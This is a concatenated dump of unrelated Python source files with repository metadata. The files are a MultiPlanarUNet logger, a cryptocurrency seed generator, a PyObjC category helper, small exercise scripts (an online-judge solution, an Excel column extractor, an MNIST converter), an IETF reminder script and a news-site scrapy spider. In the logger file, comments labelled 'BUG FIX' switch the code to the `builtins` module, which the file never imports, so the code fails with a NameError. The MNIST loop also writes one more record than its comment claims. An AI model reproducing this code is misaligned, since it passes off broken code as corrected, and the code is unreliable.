] | permissive | xiaochengcike/MultiPlanarUNet | ca8fa35a8372b8d107bb16b29018e2413c108075 | 99c73ba2936b63282338cf31fe27086d414d2e62 | refs/heads/master | 2020-04-18T19:25:51.699311 | 2019-01-10T09:39:59 | 2019-01-10T09:39:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,492 | py | import os
import inspect
from MultiPlanarUNet.utils.decorators import accepts
class Logger(object):
    """File-backed logger that can mirror messages to the screen and, used as
    a context manager, temporarily replace the global print function."""

    def __init__(self, base_path, print_to_screen=True, active_file=None,
                 overwrite_existing=False, print_calling_method=True):
        self.base_path = os.path.abspath(base_path)
        self.path = os.path.join(self.base_path, "logs")
        self.overwrite_existing = overwrite_existing

        # Keep a reference to the true built-in print so logging still works
        # while this Logger is installed as the global print function.
        # BUG FIX: __builtins__ is a dict only in __main__; inside an
        # imported module it is the builtins *module*, so the previous
        # __builtins__["print"] raised TypeError. The builtins module is
        # reliable in both cases.
        self.print_f = builtins.print

        # BUG FIX: os.mkdir failed when base_path itself did not exist;
        # makedirs(..., exist_ok=True) also removes the exists-check race.
        os.makedirs(self.path, exist_ok=True)

        # Print options
        self.separator = "-" * 80
        self.print_to_screen = print_to_screen
        self.print_calling_method = print_calling_method

        # Set paths to log files
        self.log_files = {}
        self.currently_logging = {}
        self.active_log_file = active_file or "log"

    def __repr__(self):
        return "<MultiPlanarUNet.logging.Logger object>"

    def __str__(self):
        return "Logger(base_path=%s, print_to_screen=%s, " \
               "overwrite_existing=%s)" % (self.base_path,
                                           self.print_to_screen,
                                           self.overwrite_existing)

    def new_log_file(self, filename):
        """Create (or refuse to overwrite) a log file and make it active."""
        file_path = os.path.join(self.path, "%s.txt" % filename)
        if os.path.exists(file_path):
            if self.overwrite_existing:
                os.remove(file_path)
            else:
                raise OSError("Logging path: %s already exists. "
                              "Initialize Logger(overwrite_existing=True) "
                              "to overwrite." % file_path)
        self.log_files[filename] = file_path
        self.currently_logging[filename] = None
        self.active_log_file = filename

        # Add reference to model folder in log
        ref = "Log for model in: %s" % self.base_path
        self._add_to_log(ref, no_print=True)

    @property
    def print_to_screen(self):
        return self._print_to_screen

    @print_to_screen.setter
    @accepts(bool)
    def print_to_screen(self, value):
        self._print_to_screen = value

    @property
    def print_calling_method(self):
        return self._print_calling_method

    @print_calling_method.setter
    @accepts(bool)
    def print_calling_method(self, value):
        self._print_calling_method = value

    @property
    def log(self):
        """Full text of the currently active log file."""
        with open(self.log_files[self.active_log_file], "r") as log_f:
            return log_f.read()

    @property
    def active_log_file(self):
        return self._active_log_file

    @active_log_file.setter
    @accepts(str)
    def active_log_file(self, file_name):
        # Lazily create the backing file the first time a name is used.
        if file_name not in self.log_files:
            self.new_log_file(file_name)
        self._active_log_file = file_name

    def _add_to_log(self, *args, no_print=False, **kwargs):
        """Write a message to the active log file (and optionally the screen)."""
        if self.print_to_screen and not no_print:
            self.print_f(*args, **kwargs)

        with open(self.log_files[self.active_log_file], "a") as log_file:
            self.print_f(*args, file=log_file, **kwargs)

    def _log(self, caller, print_calling_owerwrite=None, *args, **kwargs):
        """Log a message, emitting a 'Logged by' header when the caller changes."""
        if caller != self.currently_logging[self.active_log_file]:
            self.currently_logging[self.active_log_file] = caller
            if print_calling_owerwrite is not None:
                print_calling = print_calling_owerwrite
            else:
                print_calling = self.print_calling_method
            if print_calling:
                self._add_to_log("%s\n>>> Logged by: %s" % (self.separator,
                                                            self.currently_logging[self.active_log_file]))
        self._add_to_log(*args, **kwargs)

    def __call__(self, *args, print_calling_method=None, **kwargs):
        # Identify the caller as "'func' in 'file'" for the log header.
        caller = inspect.stack()[1]
        caller = "'%s' in '%s'" % (caller[3], caller[1].rpartition("/")[2])
        self._log(caller, print_calling_method, *args, **kwargs)

    def __enter__(self):
        """
        Context manager
        Sets logger as global print function within context
        """
        builtins.print = self
        return self

    def __exit__(self, *args):
        """
        Revert to default print function in global scope.

        BUG FIX: the original returned self (truthy), which made the
        context manager silently suppress any exception raised inside
        the with-block. Returning False lets exceptions propagate.
        """
        builtins.print = self.print_f
        return False
"[email protected]"
] | |
0637d34c345649b17b190752d77694ce2c4b4bb1 | 57c697ffebe2e9b3f5bd5da8122638152e4d0e9f | /contrib/seeds/makeseeds.py | 4b8d889c83c3bb295de84aab0658b5cb0d5ef45c | [
"MIT"
] | permissive | Globycoin/glbcore | 4039ddb98dec19dadebf8b2d583f27e6c083d9cd | d5dd9b5475915956849658373d8658286a08781b | refs/heads/master | 2020-03-22T20:02:44.733133 | 2018-11-15T00:42:39 | 2018-11-15T00:42:39 | 140,569,343 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 5,519 | py | #!/usr/bin/env python3
# Copyright (c) 2013-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Generate seeds.txt from Pieter's DNS seeder
#
NSEEDS=512
MAX_SEEDS_PER_ASN=2
MIN_BLOCKS = 615801
# These are hosts that have been observed to be behaving strangely (e.g.
# aggressively connecting to every node).
SUSPICIOUS_HOSTS = {
""
}
import re
import sys
import dns.resolver
import collections
PATTERN_IPV4 = re.compile(r"^((\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})):(\d+)$")
PATTERN_IPV6 = re.compile(r"^\[([0-9a-z:]+)\]:(\d+)$")
PATTERN_ONION = re.compile(r"^([abcdefghijklmnopqrstuvwxyz234567]{16}\.onion):(\d+)$")
PATTERN_AGENT = re.compile(r"^(/GlobycoinCore:2.2.(0|1|99)/)$")


def parseline(line):
    """Parse one line of seeder output into a dict of node attributes.

    A well-formed line is whitespace-separated with at least 12 fields:
    field 0 is address:port, field 1 a numeric good-flag, field 2 the
    last-success timestamp, field 7 the 30-day uptime (e.g. '100.00%'),
    field 8 the block height, field 9 the service flags in hex, field 10
    the protocol version and field 11 the quoted user agent (split over
    two fields when the agent string contains a space).

    Returns:
        dict of node attributes, or None for malformed/bad lines.
    """
    sline = line.split()
    # Fix: a well-formed line carries at least 12 fields (indices 0..11).
    # The old guard (`< 11`) let 11-field lines through, which then
    # crashed with IndexError when the user agent was read.
    if len(sline) < 12:
        return None
    m = PATTERN_IPV4.match(sline[0])
    sortkey = None
    ip = None
    if m is None:
        m = PATTERN_IPV6.match(sline[0])
        if m is None:
            m = PATTERN_ONION.match(sline[0])
            if m is None:
                return None
            else:
                net = 'onion'
                ipstr = sortkey = m.group(1)
                port = int(m.group(2))
        else:
            net = 'ipv6'
            if m.group(1) in ['::']:  # Not interested in localhost
                return None
            ipstr = m.group(1)
            sortkey = ipstr  # XXX parse IPv6 into number, could use name_to_ipv6 from generate-seeds
            port = int(m.group(2))
    else:
        # Do IPv4 sanity check: every octet must be in 0..255.
        ip = 0
        for i in range(0, 4):
            if int(m.group(i + 2)) < 0 or int(m.group(i + 2)) > 255:
                return None
            ip = ip + (int(m.group(i + 2)) << (8 * (3 - i)))
        if ip == 0:
            return None
        net = 'ipv4'
        sortkey = ip
        ipstr = m.group(1)
        port = int(m.group(6))
    # Skip bad results. Fix: the old check (`sline[1] == 0`) compared a
    # string against an int and therefore never matched, so bad results
    # were silently kept.
    if int(sline[1]) == 0:
        return None
    # Extract uptime %.
    uptime30 = float(sline[7][:-1])
    # Extract Unix timestamp of last success.
    lastsuccess = int(sline[2])
    # Extract protocol version.
    version = int(sline[10])
    # Extract user agent. 13+ fields mean the quoted agent contained a
    # space and was split in two. Fix: the old check (`> 11`) sent the
    # common single-token case into the two-token branch and crashed
    # with IndexError on sline[12].
    if len(sline) > 12:
        agent = sline[11][1:] + sline[12][:-1]
    else:
        agent = sline[11][1:-1]
    # Extract service flags.
    service = int(sline[9], 16)
    # Extract blocks.
    blocks = int(sline[8])
    # Construct result.
    return {
        'net': net,
        'ip': ipstr,
        'port': port,
        'ipnum': ip,
        'uptime': uptime30,
        'lastsuccess': lastsuccess,
        'version': version,
        'agent': agent,
        'service': service,
        'blocks': blocks,
        'sortkey': sortkey,
    }
def filtermultiport(ips):
    '''Filter out hosts with more nodes per IP'''
    # Bucket the entries by their sort key (the numeric/string address);
    # keep only addresses that appear exactly once.
    by_address = collections.defaultdict(list)
    for entry in ips:
        by_address[entry['sortkey']].append(entry)
    return [bucket[0] for bucket in by_address.values() if len(bucket) == 1]
# Based on Greg Maxwell's seed_filter.py
def filterbyasn(ips, max_per_asn, max_total):
    """Limit IPv4 seeds per ASN and overall; pass IPv6/onion through.

    Args:
        ips:         list of parsed node dicts (see parseline).
        max_per_asn: maximum number of IPv4 seeds to keep per origin ASN.
        max_total:   maximum number of IPv4 seeds to keep overall.

    Returns:
        Filtered list: capped IPv4 entries followed by all IPv6 and
        onion entries (which are currently not ASN-filtered).
    """
    # Sift out ips by type
    ips_ipv4 = [ip for ip in ips if ip['net'] == 'ipv4']
    ips_ipv6 = [ip for ip in ips if ip['net'] == 'ipv6']
    ips_onion = [ip for ip in ips if ip['net'] == 'onion']
    # Filter IPv4 by ASN
    result = []
    asn_count = {}
    for ip in ips_ipv4:
        if len(result) == max_total:
            break
        try:
            # Reverse the octets and query the Team Cymru origin-ASN
            # DNS zone; the first field of the TXT record is the ASN.
            lookup = '.'.join(reversed(ip['ip'].split('.'))) + '.origin.asn.cymru.com'
            asn = int([x.to_text() for x in dns.resolver.query(lookup, 'TXT').response.answer][0].split('\"')[1].split(' ')[0])
            if asn not in asn_count:
                asn_count[asn] = 0
            if asn_count[asn] == max_per_asn:
                continue
            asn_count[asn] += 1
            result.append(ip)
        except Exception:
            # Fix: narrowed from a bare ``except:`` so KeyboardInterrupt
            # and SystemExit still abort the run instead of being logged
            # as a resolution failure.
            sys.stderr.write('ERR: Could not resolve ASN for "' + ip['ip'] + '"\n')
    # TODO: filter IPv6 by ASN
    # Add back non-IPv4
    result.extend(ips_ipv6)
    result.extend(ips_onion)
    return result
def main():
    """Filter the seeder dump supplied on stdin and print seeds.txt lines."""
    candidates = [parseline(line) for line in sys.stdin.readlines()]
    # Drop lines that could not be parsed.
    candidates = [ip for ip in candidates if ip is not None]
    # Drop hosts observed to behave suspiciously.
    candidates = [ip for ip in candidates if ip['ip'] not in SUSPICIOUS_HOSTS]
    # Enforce a minimal block height.
    candidates = [ip for ip in candidates if ip['blocks'] >= MIN_BLOCKS]
    # Require service bit 1.
    candidates = [ip for ip in candidates if (ip['service'] & 1) == 1]
    # Require at least 50% 30-day uptime.
    candidates = [ip for ip in candidates if ip['uptime'] > 50]
    # Require a known and recent user agent (spaces normalized to dashes).
    candidates = [ip for ip in candidates
                  if PATTERN_AGENT.match(re.sub(' ', '-', ip['agent']))]
    # Most-available first; last success and IP break ties.
    candidates.sort(key=lambda x: (x['uptime'], x['lastsuccess'], x['ip']),
                    reverse=True)
    # Hosts running multiple nodes on one IP are likely abusive.
    candidates = filtermultiport(candidates)
    # Cap results per ASN and overall.
    candidates = filterbyasn(candidates, MAX_SEEDS_PER_ASN, NSEEDS)
    # Deterministic output order.
    candidates.sort(key=lambda x: (x['net'], x['sortkey']))
    for ip in candidates:
        if ip['net'] == 'ipv6':
            print('[%s]:%i' % (ip['ip'], ip['port']))
        else:
            print('%s:%i' % (ip['ip'], ip['port']))


if __name__ == '__main__':
    main()
| [
"[email protected]"
] | |
f886c22e0fbc3e0a268193239c53656c2954fcc7 | c54f5a7cf6de3ed02d2e02cf867470ea48bd9258 | /pyobjc/pyobjc-core/Lib/objc/_category.py | acfb9a48e26e38dd13712137c8517c88b442e532 | [
"MIT"
] | permissive | orestis/pyobjc | 01ad0e731fbbe0413c2f5ac2f3e91016749146c6 | c30bf50ba29cb562d530e71a9d6c3d8ad75aa230 | refs/heads/master | 2021-01-22T06:54:35.401551 | 2009-09-01T09:24:47 | 2009-09-01T09:24:47 | 16,895 | 8 | 5 | null | null | null | null | UTF-8 | Python | false | false | 2,372 | py | __all__ = ['classAddMethod', 'Category']
from _objc import selector, classAddMethods, objc_class, ivar
from types import FunctionType, MethodType
def classAddMethod(cls, name, method):
    """
    Add a single method to a class. 'name' is the ObjC selector
    """
    if isinstance(method, selector):
        # Re-wrap an existing selector under the requested name, keeping
        # its callable, signature and class-method flag.
        new_selector = selector(
            method.callable,
            selector=name,
            signature=method.signature,
            isClassMethod=method.isClassMethod)
    else:
        new_selector = selector(method, selector=name)
    return classAddMethods(cls, [new_selector])
#
# Syntactic support for categories
#
class _CategoryMeta(type):
    """
    Meta class for categories.

    Instead of creating a new type, ``__new__`` injects the methods and
    attributes of the class body into the existing Objective-C class and
    returns that class.
    """
    __slots__ = ()
    # Keys present in every class dict that are not user-defined members.
    _IGNORENAMES = ('__module__', '__name__', '__doc__')

    def _newSubclass(cls, name, bases, methods):
        # Create a plain subclass via type.__new__, bypassing the
        # category-injection logic in __new__ below.
        return type.__new__(cls, name, bases, methods)
    _newSubclass = classmethod(_newSubclass)

    def __new__(cls, name, bases, methods):
        if len(bases) != 1:
            raise TypeError("Cannot have multiple inheritance with Categories")
        # The single base is the placeholder produced by Category(); its
        # real_class attribute is the Objective-C class to extend.
        c = bases[0].real_class
        if c.__name__ != name:
            raise TypeError("Category name must be same as class name")
        # Split the class body into callables (added as methods) and
        # everything else (set as plain attributes).
        m = [ x[1] for x in methods.iteritems() if x[0] not in cls._IGNORENAMES and isinstance(x[1], (FunctionType, MethodType, selector, classmethod))]
        vars = [ x for x in methods.iteritems() if x[0] not in cls._IGNORENAMES and not isinstance(x[1], (FunctionType, MethodType, selector, classmethod))]
        for k, v in vars:
            if isinstance(v, ivar):
                raise TypeError("Cannot add instance variables in a Category")
        classAddMethods(c, m)
        for k, v in vars:
            setattr(c, k, v)
        # Return the *existing* class object, so the class statement
        # rebinds the name to the original class rather than a new type.
        return c
def Category(cls):
    """
    Create a category on ``cls``.

    Usage:
        class SomeClass (Category(SomeClass)):
            def method(self):
                pass

    ``SomeClass`` is an existing class that will be rebound to the same
    value. The side-effect of this class definition is that the methods
    in the class definition will be added to the existing class.
    """
    if not isinstance(cls, objc_class):
        # Fix: parenthesized raise instead of the Python-2-only
        # ``raise TypeError, "..."`` statement form -- behaviorally
        # identical on Python 2 and consistent with the other raises
        # in this module.
        raise TypeError("Category can only be used on Objective-C classes")
    retval = _CategoryMeta._newSubclass('Category', (), dict(real_class=cls))
    return retval
| [
"ronaldoussoren@f55f28a5-9edb-0310-a011-a803cfcd5d25"
] | ronaldoussoren@f55f28a5-9edb-0310-a011-a803cfcd5d25 |
ab81aec92b4137221d359ec9b7ddacf88e47a00b | 81e008b746f89d144066ee5589fafa370f37e5a5 | /1005.py | 8bf880a472d0444a295f1fb678435685f4c44eb9 | [] | no_license | osmarsalesjr/SolucoesUriOnlineJudgeEmPython3 | 5c43fb37608ff3d8ff042d94e6b897f4b1d6afb9 | 5de3fa39483fd4ff409efa5981e65daba7744809 | refs/heads/master | 2021-01-01T06:40:51.938732 | 2017-08-30T21:46:39 | 2017-08-30T21:46:39 | 97,482,585 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 175 | py |
def main():
    """Read two exam scores from stdin and print their weighted average."""
    first = float(input())
    second = float(input())
    # Weights: 3.5 for the first score, 7.5 for the second (sum 11).
    weighted_average = (first * 3.5 + second * 7.5) / 11
    print("MEDIA = %.5f" % weighted_average)


if __name__ == '__main__':
    main()
"[email protected]"
] | |
594f7ee6ba623887c47dbde85e653e5183136971 | f9886d2b57d92186773d73f59dc0a0e9759b8944 | /04_bigdata/02_Standardization_Analysis/2.Excel/10_excel_column_by_name_all_worksheets.py | c9fc988e32e973138146a52d7b0e7546d7aca05f | [] | no_license | Meengkko/bigdata_python2019 | 14bab0da490bd36c693f50b5d924e27f4a8e02ba | a28e964ab7cefe612041830c7b1c960f92c42ad5 | refs/heads/master | 2022-12-12T15:51:21.448923 | 2019-11-08T03:50:15 | 2019-11-08T03:50:15 | 195,142,241 | 0 | 0 | null | 2022-04-22T22:37:59 | 2019-07-04T00:17:18 | HTML | UTF-8 | Python | false | false | 1,894 | py | # 목적: 열의 인덱스 값을 사용하여 특정 열 선택하기
# 라이브러리 호출
import sys
from datetime import date
from xlrd import open_workbook, xldate_as_tuple
from xlwt import Workbook
# Input/output paths from the command line.
in_path = sys.argv[1]    # sales_2013.xlsx
out_path = sys.argv[2]   # output_files/10_output_basic.xls

# Output workbook and worksheet.
out_book = Workbook()
out_sheet = out_book.add_sheet('selected_columns_all_worksheets')
wanted_headers = ['Customer Name', 'Sale Amount']
need_header_scan = True

# Open the workbook and collect the wanted columns from every worksheet.
with open_workbook(in_path) as book:
    rows_to_write = [wanted_headers]
    keep_indexes = []
    for sheet in book.sheets():
        if need_header_scan:
            # Column positions are determined from the first worksheet's
            # header row and reused for every other worksheet.
            for col_idx, heading in enumerate(sheet.row_values(0)):
                if heading in wanted_headers:
                    keep_indexes.append(col_idx)
            need_header_scan = False
        for row_idx in range(1, sheet.nrows):
            values = []
            for col_idx in keep_indexes:
                cell_value = sheet.cell_value(row_idx, col_idx)
                if sheet.cell_type(row_idx, col_idx) == 3:
                    # Cell type 3 is an Excel date serial; render it as
                    # MM/DD/YYYY text instead of the raw number.
                    as_tuple = xldate_as_tuple(cell_value, book.datemode)
                    values.append(date(*as_tuple[0:3]).strftime('%m/%d/%Y'))
                else:
                    values.append(cell_value)
            rows_to_write.append(values)
    # Write the header plus all collected rows to the output sheet.
    for row_idx, row_values in enumerate(rows_to_write):
        for col_idx, value in enumerate(row_values):
            out_sheet.write(row_idx, col_idx, value)
out_book.save(out_path)
| [
"[email protected]"
] | |
e831918416256c25927fb1be5c435b8555f05dc6 | 577a40ff1c84d28b88a9ade84d265587d28ed2a3 | /0707/02.py | 1c05cbec1dfbd4eeaecf48ec375bcfb73a53d48c | [] | no_license | bosl95/MachineLearning_Note | b167c182fcf5186f6466b8b062cde83b076b0b04 | 934714c5a62e4864f2b5338153c3aaeb3363abe9 | refs/heads/master | 2022-12-06T20:58:20.457567 | 2020-09-05T16:18:11 | 2020-09-05T16:18:11 | 279,835,223 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,580 | py | import struct
name = 'train'
maxdata = 1000   # cap on the number of records converted to CSV
path = 'mnist/'

# MNIST IDX files: label file and image file, both big-endian binary.
lbl_f = open(path + name + '-labels-idx1-ubyte', 'rb')  # training label file (binary)
img_f = open(path + name + '-images-idx3-ubyte', 'rb')
csv_f = open(path + name + '.csv', 'w', encoding='utf-8')

# Read the magic number and label count from the label file header.
mag, lbl_count = struct.unpack('>II', lbl_f.read(8))
print(lbl_count)
# Read the magic number and image count from the image file header.
mag, img_count = struct.unpack('>II', img_f.read(8))
print(mag)
print(img_count)
# Read the image height and width from the image file header.
row, col = struct.unpack('>II', img_f.read(8))
print(row)
print(col)
px = row * col   # size in bytes of a single image
res = []         # NOTE(review): unused leftover list
for idx in range(lbl_count):
    # Stop past 1000 records. NOTE(review): '>' lets idx == maxdata
    # through, so 1001 records are written -- confirm whether '>=' was
    # intended (original comment: "break when over 1000").
    if idx > maxdata:
        break
    # One label byte from the label file.
    label = struct.unpack("B", lbl_f.read(1))[0]
    # One image's worth of pixel bytes from the image file.
    bdata = img_f.read(px)
    sdata = list(map(lambda n: str(n), bdata))
    # print(sdata)
    # CSV row: label, then the pixel values.
    csv_f.write(str(label) + ',')
    csv_f.write(','.join(sdata) + '\r\n')
    # Optional: dump the first 10 images as ASCII PGM files to visually
    # confirm the images are being read at the right offsets.
    if idx < 10:
        s = 'P2 28 28 255\n'
        s += ' '.join(sdata)
        iname = path + '{0}-{1}-{2}.pgm'.format(name, idx, label)
        with open(iname, 'w', encoding='utf-8') as f:
            f.write(s)
csv_f.close()
lbl_f.close()
img_f.close()
"[email protected]"
] | |
369183498068e8e4659aa370fd0efa60b8a6ebd1 | 72316a1d1a2e0358486d50aeecbac8219ccdf092 | /ietf/bin/send-milestone-reminders | 9ed5d254f74bbac1e2488cb1549dcb81cb5f4510 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | algby/ietfdb | 363541941bd6e806bed70891bed4c7f47c9f0539 | 9ff37e43abbecac873c0362b088a6d9c16f6eed2 | refs/heads/master | 2021-01-16T18:57:50.100055 | 2014-09-29T21:16:55 | 2014-09-29T21:16:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,566 | #!/usr/bin/env python
#
# This script will send various milestone reminders. It's supposed to
# be run daily, and will then send reminders weekly/monthly as
# appropriate.
import datetime, os
import syslog
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "ietf.settings")
syslog.openlog(os.path.basename(__file__), syslog.LOG_PID, syslog.LOG_LOCAL0)
from ietf.group.mails import *
today = datetime.date.today()

# isoweekday(): Monday == 1; day of month 1 marks the monthly run.
MONDAY = 1
FIRST_DAY_OF_MONTH = 1

# NOTE(review): the group/mail helpers below come from the
# ``from ietf.group.mails import *`` star import at the top of the file.
if today.isoweekday() == MONDAY:
    # send milestone review reminders - ideally we'd keep track of
    # exactly when we sent one last time for a group, but it's a bit
    # complicated because people can change the milestones in the mean
    # time, so dodge all of this by simply sending once a week only
    for g in groups_with_milestones_needing_review():
        mail_sent = email_milestone_review_reminder(g, grace_period=7)
        if mail_sent:
            syslog.syslog("Sent milestone review reminder for %s %s" % (g.acronym, g.type.name))

    early_warning_days = 30
    # send any milestones due reminders
    for g in groups_needing_milestones_due_reminder(early_warning_days):
        email_milestones_due(g, early_warning_days)
        syslog.syslog("Sent milestones due reminder for %s %s" % (g.acronym, g.type.name))

if today.day == FIRST_DAY_OF_MONTH:
    # send milestone overdue reminders - once a month
    for g in groups_needing_milestones_overdue_reminder(grace_period=30):
        email_milestones_overdue(g)
        syslog.syslog("Sent milestones overdue reminder for %s %s" % (g.acronym, g.type.name))
"[email protected]@7b24d068-2d4e-4fce-9bd7-cbd2762980b0"
] | [email protected]@7b24d068-2d4e-4fce-9bd7-cbd2762980b0 |
|
8d4e01d63f029ae4f6264c3ec8a2b1b51bacfbc6 | 0fa51edef92cd07033e7d03aa441ae54d8edad2e | /news_scrapers/epu_scrapy/spiders/deredactie_spider.py | f7aab7c2ba79b7d300fec7f911dcf631998cb515 | [] | no_license | Datafable/epu-index | d86fc108f7e8591cb949fde78f490fd970654bde | 3f9d24448ff85a8ea6736dbf9da0ec954a3b224b | refs/heads/master | 2020-12-25T18:13:53.397154 | 2018-03-28T09:37:53 | 2018-03-28T09:37:53 | 35,040,805 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,835 | py | import scrapy
from scrapy.contrib.spiders import CrawlSpider
from scrapy.exceptions import CloseSpider
from epu_scrapy.items import Article
from datetime import datetime, timedelta
from time import strptime, strftime, mktime
import re
import json
import os
def set_start_urls(settings):
    """
    Based on the dates given in the settings file, construct the start urls
    for the spider.

    Args:
        settings: dict with a 'term' (search term) and a 'period' that is
            either the string 'yesterday' or a dict with ISO-formatted
            'start' and 'end' dates.

    Returns:
        A single-element list with the search URL.

    Raises:
        CloseSpider: if 'period' is a string other than 'yesterday'.
    """
    term = settings['term']
    if type(settings['period']) is not dict:
        today = datetime.today()
        if settings['period'] != 'yesterday':
            # Fix: CloseSpider used to be instantiated but never raised,
            # so an unknown period setting was silently ignored and the
            # spider fell through to the 'yesterday' behavior.
            raise CloseSpider("unknown period setting. See the scrapers README for more information.")
        search_day = today - timedelta(days=1)  # search for articles of yesterday
        search_day_str = '{0}/{1}/{2}'.format(search_day.day, search_day.month, search_day.year % 100)
        start_urls = ['http://deredactie.be/cm/vrtnieuws/1.516538?text={0}&type=text&range=atdate&isdate={1}&sort=date&action=submit&advancedsearch=on'.format(term, search_day_str)]
    else:
        # awkward syntax to convert struct time to datetime (see:
        # http://stackoverflow.com/questions/1697815)
        start = datetime(*strptime(settings['period']['start'], '%Y-%m-%d')[:6])
        start_str = '{0}/{1}/{2}'.format(start.day, start.month, start.year % 100)
        end = datetime(*strptime(settings['period']['end'], '%Y-%m-%d')[:6])
        end_str = '{0}/{1}/{2}'.format(end.day, end.month, end.year % 100)
        start_urls = ['http://deredactie.be/cm/vrtnieuws/1.516538?text={0}&type=text&range=betweendate&startdate={1}&enddate={2}&sort=date&action=submit&advancedsearch=on'.format(term, start_str, end_str)]
    return start_urls
class DeredactieSpider(CrawlSpider):
    """Crawls deredactie.be search results and scrapes matching articles."""

    name = 'deredactie' # name of the spider, to be used when running from command line
    allowed_domains = ['deredactie.be']
    # Crawl settings (term + period) are read once at class-definition time.
    # NOTE(review): the file object handed to json.load() is never closed.
    settings = json.load(open(os.path.join(os.path.dirname(os.path.dirname(__file__)), 'crawling_settings.json')))
    start_urls = set_start_urls(settings)

    def parse(self, response):
        """
        Parse the first search page to determine the number of articles returned. Use the urls offset parameter
        to iterate over all response pages and yield scrapy.Request objects that will be parsed with the
        parse_list_page function
        """
        nr_of_articles_element = response.xpath('//li[contains(concat(" ", normalize-space(@class), " "), " searchcounter ")]')
        # Fix: the result count was compared with ``is 2`` -- an identity
        # check that only works because CPython caches small ints. Use a
        # proper equality comparison.
        if len(nr_of_articles_element) == 2:
            # nr of articles is mentioned above the list of articles and below
            # it, so two elements match the xpath selector
            nr_of_articles_text = ''.join(nr_of_articles_element[0].xpath('descendant-or-self::*/text()').extract())
            # Explaining the regular expression below:
            # (?P<offset>\d+) => matches a number (\d+) and assigns it to group "offset"
            # (?P<pagesize>\d+) => matches a number (\d+) and assigns it to group "pagesize"
            # \s+van\s+ => matches the word "van" surrounded by whitespace (spaces, tabs etc)
            # (?P<nr_of_articles>\d+) => matches a number (\d+) and assigns it to group "nr_of_articles"
            m = re.search('(?P<offset>\d+)-(?P<pagesize>\d+)\s+van\s+(?P<nr_of_articles>\d+)', nr_of_articles_text)
            if m:
                pagesize = int(m.group('pagesize')) - int(m.group('offset')) + 1
                nr_of_articles = int(m.group('nr_of_articles'))
                for i in range(0, nr_of_articles, pagesize):
                    # Note that the offset parameter starts at 0
                    yield scrapy.Request(self.start_urls[0] + '&offset={0}'.format(i), callback=self.parse_list_page)
            else:
                raise scrapy.exceptions.CloseSpider('Could not parse number of articles from {0}'.format(response.url))
        else:
            raise scrapy.exceptions.CloseSpider('Element containing the number of articles was not found at {0}'.format(response.url))

    def parse_published_datetime(self, datetime_element_parts):
        """
        Helper method to parse a datetime from a html element
        """
        datetime_str_parts = [x.encode('utf-8') for x in datetime_element_parts]
        datetime_str = ' '.join(datetime_str_parts).strip()
        # Keep only the 'dd/mm/yyyy ... hh:mm' portion before parsing.
        datetime_str_stripped = re.findall('[0-9]+/[0-9]+/[0-9]+[^0-9]+[0-9]+:[0-9]+', datetime_str)[0]
        dt = datetime(*strptime(datetime_str_stripped, '%d/%m/%Y - %H:%M')[0:6])
        return dt.isoformat()

    def parse_list_page(self, response):
        """
        Parse a single page returned by the search query. Find all links referring to articles and yield
        scrapy.Request objects for every link found. The parsing of these links is done by the parse_article
        function.
        """
        # Parenthesized for forward compatibility (behaves identically in
        # Python 2 for a single argument); debug output of the page URL.
        print(response.url)
        links = response.xpath('//div[contains(concat(" ", normalize-space(@class), " "), " searchresults ")]/descendant::a/@href').extract()
        link_set = set([x.encode('utf-8') for x in links])
        for l in link_set:
            if l != '#':
                # an article link can point to a single article page, or a storyline page, which includes several articles.
                # in both cases, the id of the actual article that is pointed to can be found in the url. In the case
                # of a storyline, the url is like /cm/vrtnieuws/buitenland/<storylineid>?eid=<articleid> while for a
                # single article page, the url is /cm/vrtnieuws/binnenland/<articleid>. Both a storylineid and a articleid
                # look something like 1.193019, which will be matched by the regular expression pattern [0-9.]+
                article_id = re.findall('[0-9.]+', l)[-1] # the last string that matches this pattern in the url is the article id
                l = 'http://deredactie.be/cm/' + article_id
                yield scrapy.Request(l, callback=self.parse_article)

    def parse_article(self, response):
        """
        Parse the article content page
        """
        # search for article title
        title_parts = response.xpath('//div[@id="articlehead"]/h1/text()').extract()
        if len(title_parts) > 0:
            title = ' '.join(set(title_parts)).encode('utf-8').strip()
        else:
            title = ''
        # search for article published date
        datetime_element_parts = response.xpath('//small[@id="pubdate"]/strong/text()').extract()
        if len(datetime_element_parts) > 0:
            datetime_iso_str = self.parse_published_datetime(datetime_element_parts)
        else:
            datetime_iso_str = ''
        # search for article intro text
        article_intro_parts = response.xpath('//div[@id="intro"]/strong/text()').extract()
        article_intro = ' '.join([x.strip() for x in article_intro_parts]).strip()
        # search for article full text
        article_full_text_fragments = response.xpath('//div[@id="articlebody"]/descendant::p/descendant-or-self::*/text()').extract()
        article_full_text = ' '.join([x.strip() for x in article_full_text_fragments]).strip()
        # reconstruct the url to the nicely rendered page
        url_parts = response.url.split('/')
        article_id = url_parts.pop()
        url_parts.append('vrtnieuws')
        url_parts.append(article_id)
        url = '/'.join(url_parts)
        # now create an Article item, and return it. All Articles created during scraping can be written to an output file when the -o option is given.
        article = Article()
        article['url'] = url
        article['intro'] = article_intro
        article['title'] = title
        article['published_at'] = datetime_iso_str
        article['text'] = article_full_text
        return article
| [
"[email protected]"
] | |
ea386863fc4bcc4650983431b032e9c25ddd69a7 | 8ca2c5b9673c9bf9a7b6033ffc7b3aea7008ca91 | /src/gdata/finance/__init__.py | f207b212756b50e71075be803fb53ec064e8dcbe | [
"Apache-2.0"
] | permissive | hfalcic/google-gdata | c3a10f0260002c3d8a8d44686572ec2002e076e0 | 56d49a9915ce51590a655ec5f8aeef9f65517787 | refs/heads/master | 2021-01-10T22:01:52.403803 | 2015-02-17T15:12:18 | 2015-02-17T15:12:18 | 24,432,292 | 3 | 1 | null | 2014-11-30T07:26:44 | 2014-09-24T20:53:59 | Python | UTF-8 | Python | false | false | 15,423 | py | #!/usr/bin/env python
#
# Copyright (C) 2009 Tan Swee Heng
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
